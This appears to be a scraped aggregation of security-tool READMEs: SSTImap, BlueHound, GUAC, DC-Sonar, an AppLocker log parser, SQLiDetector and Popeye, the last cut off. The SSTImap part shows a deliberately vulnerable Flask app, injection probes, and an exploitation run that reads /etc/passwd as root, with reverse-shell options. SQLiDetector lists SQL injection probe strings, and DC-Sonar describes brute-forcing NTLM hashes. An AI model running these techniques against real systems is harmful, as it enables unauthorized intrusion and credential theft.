SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added new payload for Smarty without enabled {php}{/php}. Old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed, check -h for help
  • Code is changed to use newer python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python3

Server-Side Template Injection

This is an example of a simple website written in Python using Flask framework and Jinja2 template engine. It integrates user-supplied variable name in an unsafe way, as it is concatenated to the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
# SSTI VULNERABILITY:
template = f"Hello, {name}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Not only this way of using templates creates XSS vulnerability, but it also allows the attacker to inject template code, that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix

User-supplied input should be introduced in a safe way through rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
template = "Hello, {{name}}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.

After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.

To check the URL, you can use -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

โ•”โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•โ•— โ–€โ–ˆโ–€
โ•‘ โ•”โ•โ•โ•โ•โ•ฃ โ•”โ•โ•โ•โ•โ•ฉโ•โ•โ•— โ•”โ•โ•โ•โ•โ•—โ–€โ•”โ•
โ•‘ โ•šโ•โ•โ•โ•โ•ฃ โ•šโ•โ•โ•โ•โ•— โ•‘ โ•‘ โ•‘{โ•‘ _ __ ___ __ _ _ __
โ•šโ•โ•โ•โ•โ•— โ• โ•โ•โ•โ•โ•— โ•‘ โ•‘ โ•‘ โ•‘*โ•‘ | '_ ` _ \ / _` | '_ \
โ•”โ•โ•โ•โ•โ• โ• โ•โ•โ•โ•โ• โ•‘ โ•‘ โ•‘ โ•‘}โ•‘ | | | | | | (_| | |_) |
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•ฆโ• |_| |_| |_|\__,_| .__/
โ”‚ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injecti on: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

โ•”โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•โ•— โ–€โ–ˆโ–€
โ•‘ โ•”โ•โ•โ•โ•โ•ฃ โ•”โ•โ•โ•โ•โ•ฉโ•โ•โ•— โ•”โ•โ•โ•โ•โ•—โ–€โ•”โ•
โ•‘ โ•šโ•โ•โ•โ•โ•ฃ โ•šโ•โ•โ•โ•โ•— โ•‘ โ•‘ โ•‘{โ•‘ _ __ ___ __ _ _ __
โ•šโ•โ•โ•โ•โ•— โ• โ•โ•โ•โ•โ•— โ•‘ โ•‘ โ•‘ โ•‘*โ•‘ | '_ ` _ \ / _` | '_ \
โ•”โ•โ•โ•โ•โ• โ• โ•โ•โ•โ•โ• โ•‘ โ•‘ โ•‘ โ•‘}โ•‘ | | | | | | (_| | |_) |
โ•šโ•โ•โ•โ•โ•โ•โ•ฉโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•ฆโ• |_| |_| |_|\__,_| .__/
โ”‚ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2 Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

To get a full list of options, use --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use -i argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.

Some commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial -u argument or url command. After that, you can use run command to check URL for SSTI.

If SSTI was found, commands can be used to start the exploitation. You can get the same exploitation capabilities, as in the predetermined mode, but you can use Ctrl+C to abort them without stopping a program.

By the way, test results are valid until target url is changed, so you can easily switch between exploitation methods without running detection test every time.

To get a full list of interactive commands, use command help in interactive mode.

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine RCE Blind Code evaluation File read File write
Mako โœ“ โœ“ Python โœ“ โœ“
Jinja2 โœ“ โœ“ Python โœ“ โœ“
Python (code eval) โœ“ โœ“ Python โœ“ โœ“
Tornado โœ“ โœ“ Python โœ“ โœ“
Nunjucks โœ“ โœ“ JavaScript โœ“ โœ“
Pug โœ“ โœ“ JavaScript โœ“ โœ“
doT โœ“ โœ“ JavaScript โœ“ โœ“
Marko โœ“ โœ“ JavaScript โœ“ โœ“
JavaScript (code eval) โœ“ โœ“ JavaScript โœ“ โœ“
Dust (<= dustjs-helpers@1.5.0) โœ“ โœ“ JavaScript โœ“ โœ“
EJS โœ“ โœ“ JavaScript โœ“ โœ“
Ruby (code eval) โœ“ โœ“ Ruby โœ“ โœ“
Slim โœ“ โœ“ Ruby โœ“ โœ“
ERB โœ“ โœ“ Ruby โœ“ โœ“
Smarty (unsecured) โœ“ โœ“ PHP โœ“ โœ“
Smarty (secured) โœ“ โœ“ PHP โœ“ โœ“
PHP (code eval) โœ“ โœ“ PHP โœ“ โœ“
Twig (<=1.19) โœ“ โœ“ PHP โœ“ โœ“
Freemarker โœ“ โœ“ Java โœ“ โœ“
Velocity โœ“ โœ“ Java โœ“ โœ“
Twig (>1.19) ร— ร— ร— ร— ร—
Dust (> dustjs-helpers@1.5.0) ร— ร— ร— ร— ร—

Burp Suite Plugin

Currently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.

Future plans

If you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


BlueHound - Tool That Helps Blue Teams Pinpoint The Security Issues That Actually Matter


BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network
It is a fork of NeoDash, reimagined, to make it suitable for defensive security purposes.

To get started with BlueHound, check out our introductory video, blog post and Nodes22 conference talk.


BlueHound supports presenting your data as tables, graphs, bar charts, line charts, maps and more. It contains a Cypher editor to directly write the Cypher queries that populate the reports. You can save dashboards to your database, and share them with others.

Main Features

  1. Full Automation: The entire cycle of collection, analysis and reporting is basically done with a click of a button.
  2. Community Driven: BlueHound configuration can be exported and imported by others. Sharing of knowledge, best practices, collection methodologies and more, built-into the tool itself.
  3. Easy Reporting: Creating customized report can be done intuitively, without the need to write any code.
  4. Easy Customization: Any custom collection method can be added into BlueHound. Users can even add their own custom parameters or even custom icons for their graphs.

Getting Started

ROST ISO

BlueHound can be used as part of the ROST image, which comes pre-configured with everything you need (BlueHound, Neo4j, BloodHound, and a sample dataset).
To load ROST, create a new virtual machine, and install it from the ISO like you would for a new Windows host.

BlueHound Binary

If you already have a Neo4j instance running, you can download a pre-compiled version of BlueHound from our release page. Just download the zip file suitable to your OS version, extract it, and run the binary.

Using BlueHound

  1. Connect to your Neo4j server
  2. Download SharpHound, ShotHound and the Vulnerability Scanner report parser
  3. Use the Data Import section to collect & import data into your Neo4j database.
  4. Once you have data loaded, you can use the Configurations tab to set up the basic information that is used by the queries (e.g. Domain Admins group, crown jewels servers).
  5. Finally, the Queries section can be used to prepare the reports.

BlueHound How-To

Data Collection

The Data Import Tools section can be used to collect data in a click of a button. By default, BlueHound comes preconfigured with SharpHound, ShotHound, and the Vulnerability Scanners script. Additional tools can be added for more data collection. To get started:

  1. Download the relevant tools using the globe icon
  2. Configure the tool path & arguments for each tool
  3. Run the tools

The built-in tools can be configured to automatically upload the results to your Neo4j instance.

Running & Viewing Queries

To get results for a chart, either use the Refresh icon to run a specific query, or use the Query Runner section to run queries in batches. The results will be cached even after closing BlueHound, and can be run again to get updated results.
Some charts have an Info icon which explain the query and/or provide links to additional information.

Adding & Editing Queries

You can edit the query for new and/or existing charts by using the Settings icon on the top right section of the chart. Here you can use any parameters configured with a Param Select chart, and any Edge Filtering string (see section below).

Edge Filtering

Using the Edge Filtering section, you can filter out specific relationship types for all queries that use the relevant string in their query. For example, ":FILTERED_EDGES" can be used to filter by all the selection filters.
You can also filter by a specific category (see the Info icon) or even define your own custom edge filters.

Import & Export Config

The Export Config and Import Config sections can be used to save & load your dashboard and configurations as a backup, and even shared between users to collaborate and contribute insightful queries to the security community. Donโ€™t worry, your credentials and data wonโ€™t be exported.

Note: any arguments for data import tools are also exported, so make sure you remove any secrets before sharing your configuration.

Settings

The Settings section allows you to set some global limits on query execution โ€“ maximum query time and a limit for returned results.

Technical Info

BlueHound is a fork of NeoDash, built with React and use-neo4j. It uses charts to power some of the visualizations. You can also extend NeoDash with your own visualizations. Check out the developer guide in the project repository.

Developer Guide

Run & Build using npm

BlueHound is built with React. You'll need npm installed to run the web app.

Use a recent version of npm and node to build BlueHound. The application has been tested with npm 8.3.1 & node v17.4.0.

To run the application in development mode:

  • clone this repository.
  • open a terminal and navigate to the directory you just cloned.
  • execute npm install to install the necessary dependencies.
  • execute npm run dev to run the app in development mode.
  • the application should be available at http://localhost:3000.

To build the app for production:

  • follow the steps above to clone the repository and install dependencies.
  • execute npm run build. This will create a build folder in your project directory.
  • deploy the contents of the build folder to a web server. You should then be able to run the web app.

Questions / Suggestions

We are always open to ideas, comments, and suggestions regarding future versions of BlueHound, so if you have ideas, donโ€™t hesitate to reach out to us at support@zeronetworks.com or open an issue/pull request on GitHub.



GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


Note: GUAC is under active development - if you are interested in contributing, please look at contributor guide and the "express interest" issue

Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph databaseโ€”normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.


Conceptually, GUAC occupies the โ€œaggregation and synthesisโ€ layer of the software supply chain transparency logical model:

A few examples of questions answered by GUAC include:

Quickstart

Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

Architecture

Here is an overview of the architecture of GUAC:

Supported input formats

Additional References

Communication

We encourage discussions to be done on github issues. We also have a public slack channel on the OpenSSF slack.

For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

Governance

Information about governance can be found here.



DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts

DC Sonar Community

Repositories

The project consists of repositories:

Disclaimer

It's only for education purposes.

Avoid using it on the production Active Directory (AD) domain.

Neither contributor incur any responsibility for any using it.

Social media

Check out our Red Team community Telegram channel

Description

Architecture

For the visual descriptions, open the diagram files using the diagrams.net tool.

The app consists of:


Functionallity

The DC Sonar Community provides functionality for analyzing AD domains for security risks related to accounts:

  • Register analyzing AD domain in the app

  • See the statuses of domain analyzing processes

  • Dump and brute NTLM hashes from set AD domains to list accounts with weak and vulnerable passwords

  • Analyze AD domain accounts to list ones with never expire passwords

  • Analyze AD domain accounts by their NTLM password hashes to determine accounts and domains where passwords repeat

Installation

Docker

In progress ...

Manually using dpkg

It is assumed that you have a clean Ubuntu Server 22.04 and account with the username "user".

The app will install to /home/user/dc-sonar.

The next releases maybe will have a more flexible installation.

Download dc_sonar_NNNN.N.NN-N_amd64.tar.gz from the last distributive to the server.

Create a folder for extracting files:

mkdir dc_sonar_NNNN.N.NN-N_amd64

Extract the downloaded archive:

tar -xvf dc_sonar_NNNN.N.NN-N_amd64.tar.gz -C dc_sonar_NNNN.N.NN-N_amd64

Go to the folder with the extracted files:

cd dc_sonar_NNNN.N.NN-N_amd64/

Install PostgreSQL:

sudo bash install_postgresql.sh

Install RabbitMQ:

sudo bash install_rabbitmq.sh

Install dependencies:

sudo bash install_dependencies.sh

It will ask for confirmation of adding the ppa:deadsnakes/ppa repository. Press Enter.

Install dc-sonar itself:

sudo dpkg -i dc_sonar_NNNN.N.NN-N_amd64.deb

It will ask for information for creating a Django admin user. Provide username, mail and password.

It will ask for information for creating a self-signed SSL certificate twice. Provide required information.

Open: https://localhost

Enter Django admin user credentials set during the installation process before.

Style guide

See the information in STYLE_GUIDE.md

Deployment for development

Docker

In progress ...

Manually using Windows host and Ubuntu Server guest

In this case, we will set up the environment for editing code on the Windows host while running Python code on the Ubuntu guest.

Set up the virtual machine

Create a virtual machine with 2 CPU, 2048 MB RAM, 10GB SSD using Ubuntu Server 22.04 iso in VirtualBox.

If Ubuntu installer asks for updating ubuntu installer before VM's installation - agree.

Choose to install OpenSSH Server.

VirtualBox Port Forwarding Rules:

Name Protocol Host IP Host Port Guest IP Guest Port
SSH TCP 127.0.0.1 2222 10.0.2.15 22
RabbitMQ management console TCP 127.0.0.1 15672 10.0.2.15 15672
Django Server TCP 127.0.0.1 8000 10.0.2.15 8000
NTLM Scrutinizer TCP 127.0.0.1 5000 10.0.2.15 5000
PostgreSQL TCP 127.0.0.1 25432 10.0.2.15 5432

Config Window

Download and install Python 3.10.5.

Create a folder for the DC Sonar project.

Go to the project folder using Git for Windows:

cd '{PATH_TO_FOLDER}'

Make Windows installation steps for dc-sonar-user-layer.

Make Windows installation steps for dc-sonar-workers-layer.

Make Windows installation steps for ntlm-scrutinizer.

Make Windows installation steps for dc-sonar-frontend.

Set shared folders

Make steps from "Open VirtualBox" to "Reboot VM", but add shared folders to VM VirtualBox with "Auto-mount", like in the picture below:

After reboot, run command:

sudo adduser $USER vboxsf

Perform logout and login for the using user account.

In /home/user directory, you can use mounted folders:

ls -l
Output:
total 12
drwxrwx--- 1 root vboxsf 4096 Jul 19 13:53 dc-sonar-user-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 10:11 dc-sonar-workers-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 14:25 ntlm-scrutinizer

Config Ubuntu Server

Config PostgreSQL

Install PostgreSQL on Ubuntu 20.04:

sudo apt update
sudo apt install postgresql postgresql-contrib
sudo systemctl start postgresql.service

Create the admin database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: admin
Shall the new role be a superuser? (y/n) y

Create the dc_sonar_workers_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_workers_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the dc_sonar_user_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_user_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the back_workers_db database:

sudo -u postgres createdb back_workers_db

Create the web_app_db database:

sudo -u postgres createdb web_app_db

Run the psql:

sudo -u postgres psql

Set a password for the admin account:

ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_workers_layer account:

ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_user_layer account:

ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';

Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:

\c back_workers_db
GRANT CONNECT ON DATABASE back_workers_db to dc_sonar_workers_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_workers_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;

Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:

\c web_app_db
GRANT CONNECT ON DATABASE web_app_db to dc_sonar_user_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_user_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;

Exit of the psql:

\q

Open the pg_hba.conf file:

sudo nano /etc/postgresql/12/main/pg_hba.conf

Add the line for the connection to allow the connection from the host machine to PostgreSQL, save changes and close the file:

# IPv4 local connections:
host all all 127.0.0.1/32 md5
host all admin 0.0.0.0/0 md5

Open the postgresql.conf file:

sudo nano /etc/postgresql/12/main/postgresql.conf

Change specified below params, save changes and close the file:

listen_addresses = 'localhost,10.0.2.15'
shared_buffers = 512MB
work_mem = 5MB
maintenance_work_mem = 100MB
effective_cache_size = 1GB

Restart the PostgreSQL service:

sudo service postgresql restart

Check the PostgreSQL service status:

service postgresql status

Check the log file if it is needed:

tail -f /var/log/postgresql/postgresql-12-main.log

Now you can connect to created databases using admin account and client such as DBeaver from Windows.

Config RabbitMQ

Install RabbitMQ using the script.

Enable the management plugin:

sudo rabbitmq-plugins enable rabbitmq_management

Create the RabbitMQ admin account:

sudo rabbitmqctl add_user admin {YOUR_PASSWORD}

Tag the created user for full management UI and HTTP API access:

sudo rabbitmqctl set_user_tags admin administrator

Open management UI on http://localhost:15672/.

Install Python3.10

Ensure that your system is updated and the required packages installed:

sudo apt update && sudo apt upgrade -y

Install the required dependency for adding custom PPAs:

sudo apt install software-properties-common -y

Then proceed and add the deadsnakes PPA to the APT package manager sources list as below:

sudo add-apt-repository ppa:deadsnakes/ppa

Download Python 3.10:

sudo apt install python3.10=3.10.5-1+focal1

Install the dependencies:

sudo apt install python3.10-dev=3.10.5-1+focal1 libpq-dev=12.11-0ubuntu0.20.04.1 libsasl2-dev libldap2-dev libssl-dev

Install the venv module:

sudo apt-get install python3.10-venv

Check the version of installed python:

python3.10 --version

Output:
Python 3.10.5
Hosts

Add IP addresses of Domain Controllers to /etc/hosts

sudo nano /etc/hosts

Layers

Set venv

We have to create venv on a level above as VM VirtualBox doesn't allow us to make it in shared folders.

Go to the home directory where shared folders located:

cd /home/user

Make deploy steps for dc-sonar-user-layer on Ubuntu.

Make deploy steps for dc-sonar-workers-layer on Ubuntu.

Make deploy steps for ntlm-scrutinizer on Ubuntu.

Config modules

Make config steps for dc-sonar-user-layer on Ubuntu.

Make config steps for dc-sonar-workers-layer on Ubuntu.

Make config steps for ntlm-scrutinizer on Ubuntu.

Run

Make run steps for ntlm-scrutinizer on Ubuntu.

Make run steps for dc-sonar-user-layer on Ubuntu.

Make run steps for dc-sonar-workers-layer on Ubuntu.

Make run steps for dc-sonar-frontend on Windows.

Open https://localhost:8000/admin/ in a browser on the Windows host and agree with the self-signed certificate.

Open https://localhost:4200/ in the browser on the Windows host and login as created Django user.



Get-AppLockerEventlog - Script For Fetching Applocker Event Log By Parsing The Win-Event Log


This script will parse all the channels of events from the win-event log to extract all the log relatives to AppLocker. The script will gather all the important pieces of information relative to the events for forensic or threat-hunting purposes, or even in order to troubleshoot. Here are the logs we fetch from win-event:

  • EXE and DLL,
  • MSI and Script,
  • Packaged app-Deployment,
  • Packaged app-Execution.

The output:

  • The result will be displayed on the screen

  • And, The result will be saved to a csv file: AppLocker-log.csv

The juicy and useful information you will get with this script are:

  • FileType,
  • EventID,
  • Message,
  • User,
  • Computer,
  • EventTime,
  • FilePath,
  • Publisher,
  • FileHash,
  • Package
  • RuleName,
  • LogName,
  • TargetUser.

PARAMETERS

HunType

This parameter specifies the type of events you are interested in, there are 04 values for this parameter:

1. All

This gets all the events of AppLocker that are interesting for threat-hunting, forensic or even troubleshooting. This is the default value.

.\Get-AppLockerEventlog.ps1 -HunType All

2. Block

This gets all the events that are triggered by the action of blocking an application by AppLocker, this type is critical for threat-hunting or forensics, and comes with high priority, since it indicates malicious attempts, or could be a good indicator of prior malicious activity in order to evade defensive mechanisms.

.\Get-AppLockerEventlog.ps1 -HunType Block |Format-Table -AutoSize

3. Allow

This gets all the events that are triggered by the action of Allowing an application by AppLocker. For threat-hunting or forensics, even the allowed applications should be monitored, in order to detect any possible bypass or configuration mistakes.

.\Get-AppLockerEventlog.ps1 -HunType Allow | Format-Table -AutoSize

4. Audit

This gets all the events generated when AppLocker would block the application if the enforcement mode were enabled (Audit mode). For threat-hunting or forensics, this could indicate any configuration mistake, neglect from the admin to switch the mode, or even a malicious action that happened in the audit phase (tuning phase).

 .\Get-AppLockerEventlog.ps1 -HunType Audit

Resource

To better understand AppLocker :

Contributing

This project welcomes contributions and suggestions.



SQLiDetector - Helps You To Detect SQL Injection "Error Based" By Sending Multiple Requests With 14 Payloads And Checking For 152 Regex Patterns For Different Databases


Simple python script supported with BurpBouty profile that helps you to detect SQL injection "Error based" by sending multiple requests with 14 payloads and checking for 152 regex patterns for different databases.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
| S|Q|L|i| |D|e|t|e|c|t|o|r|
| Coded By: Eslam Akl @eslam3kll & Khaled Nassar @knassar702
| Version: 1.0.0
| Blog: eslam3kl.medium.com
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


Description

The main idea for the tool is scanning for Error Based SQL Injection by using different payloads like

'123
''123
`123
")123
"))123
`)123
`))123
'))123
')123"123
[]123
""123
'"123
"'123
\123

And match for 152 error regex patterns for different databases.
Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml

How does it work?

It's very simple, just organize your steps as follows

  1. Use your subdomain grabber script or tools.
  2. Pass all collected subdomains to httpx or httprobe to get only live subs.
  3. Use your links and URLs tools to grab all waybackurls like waybackurls, gau, gauplus, etc.
  4. Use URO tool to filter them and reduce the noise.
  5. Grep to get all the links that contain parameters only. You can use Grep or GF tool.
  6. Pass the final URLs file to the tool, and it will test them.

The final schema of URLs that you will pass to the tool must be like this one

https://aykalam.com?x=test&y=fortest
http://test.com?parameter=ayhaga

Installation and Usage

Just run the following command to install the required libraries.

~/eslam3kl/SQLiDetector# pip3 install -r requirements.txt 

To run the tool itself.

# cat urls.txt
http://testphp.vulnweb.com/artists.php?artist=1

# python3 sqlidetector.py -h
usage: sqlidetector.py [-h] -f FILE [-w WORKERS] [-p PROXY] [-t TIMEOUT] [-o OUTPUT]
A simple tool to detect SQL errors
optional arguments:
-h, --help show this help message and exit]
-f FILE, --file FILE [File of the urls]
-w WORKERS, --workers [WORKERS Number of threads]
-p PROXY, --proxy [PROXY Proxy host]
-t TIMEOUT, --timeout [TIMEOUT Connection timeout]
-o OUTPUT, --output [OUTPUT [Output file]

# python3 sqlidetector.py -f urls.txt -w 50 -o output.txt -t 10

BurpBounty Module

I've created a burpbounty profile that uses the same payloads add injecting them at multiple positions like

  • Parameter name
  • Parameter value
  • Headers
  • Paths

I think it's more effective and will helpful for POST request that you can't test them using the Python script.

How does it test the parameter?

What's the difference between this tool and any other one? If we have a link like this one https://example.com?file=aykalam&username=eslam3kl so we have 2 parameters. It creates 2 possible vulnerable URLs.

  1. It will work for every payload like the following
https://example.com?file=123'&username=eslam3kl
https://example.com?file=aykalam&username=123'
  1. It will send a request for every link and check if one of the patterns is existing using regex.
  2. For any vulnerable link, it will save it at a separate file for every process.

Upcoming updates

  • Output json option.
  • Adding proxy option.
  • Adding threads to increase the speed.
  • Adding progress bar.
  • Adding more payloads.
  • Adding BurpBounty Profile.
  • Inject the payloads in the parameter name itself.

If you want to contribute, feel free to do that. You're welcome :)

Thanks to

Thanks to Mohamed El-Khayat and Orwa for the amazing paylaods and ideas. Follow them and you will learn more

https://twitter.com/Mohamed87Khayat
https://twitter.com/GodfatherOrwa

Stay in touch <3

LinkedIn | Blog | Twitter



Popeye - A Kubernetes Cluster Resource Sanitizer

Popeye - A Kubernetes Cluster Sanitizer

Popeye is a utility that scans live Kubernetes cluster and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.

Popeye is a readonly tool, it does not alter any of your Kubernetes resources in any way!


Installation

Popeye is available on Linux, OSX and Windows platforms.

  • Binaries for Linux, Windows and Mac are available as tarballs in the release page.

  • For OSX/Unit using Homebrew/LinuxBrew

    brew install derailed/popeye/popeye
  • Building from source Popeye was built using go 1.12+. In order to build Popeye from source you must:

    1. Clone the repo

    2. Add the following command in your go.mod file

      replace (
      github.com/derailed/popeye => MY_POPEYE_CLONED_GIT_REPO
      )
    3. Build and run the executable

      go run main.go

    Quick recipe for the impatient:

    # Clone outside of GOPATH
    git clone https://github.com/derailed/popeye
    cd popeye
    # Build and install
    go install
    # Run
    popeye

PreFlight Checks

  • Popeye uses 256 colors terminal mode. On `Nix system make sure TERM is set accordingly.

    export TERM=xterm-256color

Sanitizers

Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch'in to make Popeye even better.

The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...

Popeye is not another static analysis tool. It runs and inspect Kubernetes resources on live clusters and sanitize resources as they are in the wild!

Here is a list of some of the available sanitizers:

Resource Sanitizers Aliases
๏›€
Node no
Conditions ie not ready, out of mem/disk, network, pids, etc
Pod tolerations referencing node taints
CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM)
๏›€
Namespace ns
Inactive
Dead namespaces
๏›€
Pod po
Pod status
Containers statuses
ServiceAccount presence
CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM)
Container image with no tags
Container image using latest tag
Resources request/limits presence
Probes liveness/readiness presence
Named ports and their references
๏›€
Service svc
Endpoints presence
Matching pods labels
Named ports and their references
๏›€
ServiceAccount sa
Unused, detects potentially unused SAs
๏›€
Secrets sec
Unused, detects potentially unused secrets or associated keys
๏›€
ConfigMap cm
Unused, detects potentially unused cm or associated keys
๏›€
Deployment dp, deploy
Unused, pod template validation, resource utilization
๏›€
StatefulSet sts
Unsed, pod template validation, resource utilization
๏›€
DaemonSet ds
Unsed, pod template validation, resource utilization
๏›€
PersistentVolume pv
Unused, check volume bound or volume error
๏›€
PersistentVolumeClaim pvc
Unused, check bounded or volume mount error
๏›€
HorizontalPodAutoscaler hpa
Unused, Utilization, Max burst checks
๏›€
PodDisruptionBudget
